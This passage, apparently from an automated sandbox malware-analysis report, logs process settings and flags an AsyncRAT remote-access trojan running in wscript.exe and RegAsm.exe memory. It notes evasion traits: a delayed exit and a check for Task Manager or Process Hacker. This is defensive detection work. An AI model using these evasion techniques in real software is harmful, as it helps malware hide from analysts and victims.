        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\winhlp32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Delayed program exit found
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040F7A7 Sleep,ExitProcess,17_2_0040F7A7
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040F7A7 Sleep,ExitProcess,19_2_0040F7A7
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040F7A7 Sleep,ExitProcess,21_2_0040F7A7
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040F7A7 Sleep,ExitProcess,23_2_0040F7A7
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040F7A7 Sleep,ExitProcess,27_2_0040F7A7
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
